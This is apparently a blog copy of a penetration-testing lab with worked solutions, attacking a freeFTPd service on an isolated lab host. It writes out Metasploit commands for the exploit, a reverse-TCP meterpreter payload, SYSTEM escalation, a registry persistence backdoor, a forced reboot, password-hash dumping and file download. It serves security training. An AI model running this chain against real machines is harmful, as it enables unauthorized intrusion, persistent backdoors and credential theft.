In this lab, you will have to use Metasploit and meterpreter against a real machine; this will help you become familiar with the Metasploit framework and its features.

Goal

The goals of the lab are to:

Identify the target machine on the network
Find a vulnerable service
Exploit the service by using Metasploit to get a meterpreter session
Gather information from the machine by using meterpreter commands
Retrieve the password hashes from the exploit machine
Search for a file named \"Congrats.txt\"

Tools

The best tools for this lab are:

Nmap
Metasploit (Metasploit 5 is recommended)
John the Ripper

Steps

Find a target in the network

Since we do not have any information about the remote network and the hosts attached to it, the first step is to find a possible target!

Identify available services on the target

Now that we know there is a host on the target network, scan the host and gather as much information as possible.

Find a vulnerable service in Metasploit

You should have identified a few services running on the machine. Check if Metasploit contains any working exploit for that specific services and version

Configure the module and exploit the machine

Select the Metasploit module found in the previous step and configure it with the correct parameters. Once you have the module set, launch the exploit! You should get a meterpreter session!

Obtain SYSTEM privileges on the machine

The most important step once you exploit a machine is to get the highest privileges you can. This will allow you to access much more information as well as run much more commands. Try to obtain system privileges on the machine!

Install a backdoor

Now that you have full privileges on the machine, install a backdoor on it.

If you want to test if the backdoor works, just run \"reboot\" in the meterpreter session and wait a minute. Once the machine turns back, you should be able to use your backdoor!

Get the password hashes and crack them

It is now time to gather some data! Dump all the password hashes of the exploited machine!

Once you have them, you can also try to crack the passwords with John the Ripper.

Gather information

Try to gather as much information as possible from the target machine: applications, routes, interfaces and so on. Explore the machine and the Metasploit module to practice with different tools and output.

Locate and download the congrats.txt file

Browse the target machine, find the file named \"Congrats.txt\" and download it into your machine!

SOLUTIONS

Below, you will find solutions for every task of this lab. Please go ahead ONLY if you have COMPLETED the lab or you are stuck. Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of the hands-on lab!

Solutions steps

Find a target in the network

We first need to verify which is the remote network. We can do so by running ifconfig and then checking the IP address of our tap0 interface.

As we can see, the target network is 192.168.99.0/24.

Let\'s run nmap -sn in order to discover available hosts on the network:

The above screenshot shows that the only host alive in the network is 192.168.99.12 (besides our host: 192.168.99.100).

Identify available services on the target

Run a service detection scan and verify which services are listening on the remote host:

As we can see in the previous output, there are a few services enabled.

Let's focus our tests on the FreeFTPd.

Find a vulnerable service in Metasploit

Run a search in the Metasploit database and see if there are any modules related to the freeFTPd service:

msf5> search freeftp

Reviewing the output in the above screenshot, we can see that there are a few modules we can use. Let's select the first in the list as it was the most recent one that was discovered and is also the more reliable.

Configure the module and exploit the machine

First, select the module and configure its options as follows:

use exploit/windows/ftp/freeftpd_pass
set ftpuser anonymous
set rhosts 192.168.99.12
set rport 21
set payload windows/meterpreter/reverse_tcp
set exitfunc process
set lhost 192.168.99.100
set lport 4444

The previous screenshot shows the module configured and ready to run. We just had to select the RHOST and set the payload options.

Now we can start the module by typing exploit:

As we can see, we have successfully exploited the service! A meterpreter session is opened, and our prompt changes!

Obtain SYSTEM privileges on the machine

As you already know, meterpreter offers a lot of commands and functionalities.

In order to escalate privileges on Windows machines we just have to type getsystem and hit enter:

In the above screenshot, you can see how we successfully escalated the privileges (from ftp user to system).

Install a backdoor

There are many modules and commands that we can use to install a backdoor on the target machine automatically.

In this lab, we are going to use the persistence module as follows.

By pressing Ctrl + z inside the meterpreter prompt, we can put it into the background and work further on the backdoor:

One additional thing we must do is check the session number.

Type "sessions -l" inside the Metasploit prompt and keep in mind the Id value:

Now, let's go to the persistence module, as follows:

Let's configure it.

The session should be set to the value obtained above.

use exploit/windows/local/persistence
set reg_name backdoor
set exe_name backdoor
set startup SYSTEM
set session 1
set payload windows/meterpreter/reverse_tcp
set exitfunc process
set lhost 192.168.99.100
set lport 5555
set DisablePayloadHandler false
exploit //if the backdoor doesn't start immediately, use "exploit -j" instead

Note that we will also need to enable the Payload Handler in order to receive the connection, as follows:

As we can see in the screenshot, we set the STARTUP parameter to SYSTEM (since we have system privileges on the machine) but also set the name of the Windows registry key to \"backdoor\".

Moreover, if you check the payload options, we set the backdoor to connect on our local IP address on port 5555.

Let's try to run it!

Depending on your version of Kali and Metasploit you might receive the shell immediately or not.

Older versions of Metasploit / Kali may allow you to establish a new session immediately, while Kali 2019+ / Metasploit5 may require a reboot.

If your output looks like than the one below and your meterpreter shell on port 5555 didn't pop out, you need to proceed further:

As you can see, the backdoor has been successfully installed, but it was just planted on the target system in the registry's autorun area. In order to run the backdoor, we need to perform a system reboot (a user who switches off and on his machine would have caused the backdoor to run eventually). Let's go back to our meterpreter session and spawn a shell to reboot the victim system:

sessions -i 1
shell
shutdown /r /f

You will know that the reboot occurred when your meterpreter session dies after a minute or two:

Let's go back to the shell.

When in shell, press Ctrl+Z twice to return to the main Metasploit menu. Type "jobs -l" to see if any active listeners are running:

It seems that we are currently unable to receive any backdoor connection since there are no working listeners.

In this case, let's create a Metasploit listener to receive the connection. The payload has to be of the same type as the backdoor that was placed on the victim system:

use exploit/multi/handler
set lhost 192.168.99.100
set lport 5555
set payload windows/meterpreter/reverse_tcp
exploit -j

Now, press ENTER. You should be now able to interact with your backdoor session:

Get the password hashes and crack them

Let\'s now escalate to SYSTEM once again and then try to dump the password hashes from victim machine, as follows:

Once we have the hashes, we can store them locally into a file and use John the Ripper to crack them.

Gather information

In this task, you can use every command or module you want to gather information from the remote machine; this will help you to better understand how to use Metasploit and its features.

Locate and download the congrats.txt file

In order to locate and download the Congrats.txt file we can simply run the following commands:

search -f congrats.txt
download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/
# or
download 'c:\\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

Now, we just need to open it:

Meterpreter - Study Guide

Meterpreter

Beyond Remote Code Execution

Shells

What to do Next - Study Guide

Black-box Penetration Test 1

Black-box Penetration Test 2

Black-box Penetration Test 3

Penetration Testing Approach - Study Guide

Career Paths - Study Guide

Search This Blog

Ethical hacking and penetration testing

Metasploit

Goal

Tools

Steps

Find a target in the network

Identify available services on the target

Find a vulnerable service in Metasploit

Configure the module and exploit the machine

Obtain SYSTEM privileges on the machine

Install a backdoor

Get the password hashes and crack them

Gather information

Locate and download the congrats.txt file

SOLUTIONS

Solutions steps

Find a target in the network

Identify available services on the target

Find a vulnerable service in Metasploit

Configure the module and exploit the machine

Obtain SYSTEM privileges on the machine

Install a backdoor

Get the password hashes and crack them

Gather information

Locate and download the congrats.txt file

Comments

Post a Comment

Popular Posts

Finding wifi passwords with ccmd